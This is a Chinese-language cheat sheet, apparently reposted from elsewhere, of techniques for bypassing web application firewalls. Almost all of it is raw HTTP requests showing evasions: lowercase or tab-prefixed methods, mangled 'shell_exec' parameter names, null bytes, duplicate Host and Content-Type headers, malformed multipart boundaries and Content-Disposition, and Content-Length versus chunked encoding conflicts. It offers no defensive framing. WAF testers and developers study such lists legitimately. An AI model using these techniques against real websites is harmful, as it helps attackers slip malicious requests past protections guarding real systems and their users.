WAF 绕过备忘单
在第一行 HTTP 请求前添加 \r\n
GET /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
用小写字母编写方法(Apache)
get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
方法前的选项卡 (IIS)
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
GET /login?shell_exec HTTP/1.1
GET /login?shell.exec HTTP/1.1
GET /login?shell[exec HTTP/1.1
GET /login?shell%5bexec HTTP/1.1
GET /login?shell%2eexec HTTP/1.1
GET /login?shell%5fexec HTTP/1.1
GET /login?shell%20exec HTTP/1.1
GET /login.php?pam_param=test3
GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3
GET /login.php?hello=world HTTP/1.1
GET /login.php?hello%00another_text=world HTTP/1.1
HTTP 请求 - absoluteURI
GET http://localhost/login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
双主机头
GET /login.php HTTP/1.1
Host: favoritewaf.com
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
小写主机
GET /login.php HTTP/1.1
host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
没有空间的主机
GET /login.php HTTP/1.1
Host:favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
带选项卡的主机
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
带有附加符号的主机
/ : \x00 \x20 \x09 \xad (IIS)
例子:
GET /login.php HTTP/1.1
Host: favoritewaf.com:12345
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
GET /login.php HTTP/1.1
Host: favoritewaf.com ignored.text
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type 与另一个文本
POST /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/another-text/+++x-www-form-urlencoded
hello=world
Content-Length 不正确的 HTTP 请求(比指定的数据更多)
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Length: 1
AAAAAAAA
双内容类型
Content-Type: multipart/form-data; boundary=ZZZ
Content-Type: multipart/form-data; boundary=AAA
内容处置突变
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=--------1218108630
----------1218108630
Content-Disposition: form-data; name="hello"
world
----------1218108630--
Content-Disposition: form-data; name="hello"
Content-Disposition: form-data; name="hello
Content-Disposition: form-data; name="hello"world"
Content-Disposition: attachment; name="hello"
Content-Type: multipart/form-data; boundary=x
--x
Content-Disposition:
test1;
--x
test2;
--x--
test3;
name="hello"
world
边界突变 PHP
Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;
==
Content-Type: multipart/form-data; boundary=X;
空字节
Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX
==
Content-Type: multipart/form-data; boundary=HELLO
忽略的内容长度
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
hello=world
==
Content-Length: 22
Transfer-Encoding: chunked
0B
hello=world
0
==
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Transfer-Encoding: chunked
3
hel
3
lo=
3
wor
2
ld
0
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若本站内容侵犯了原著者的合法权益,可联系本站删除。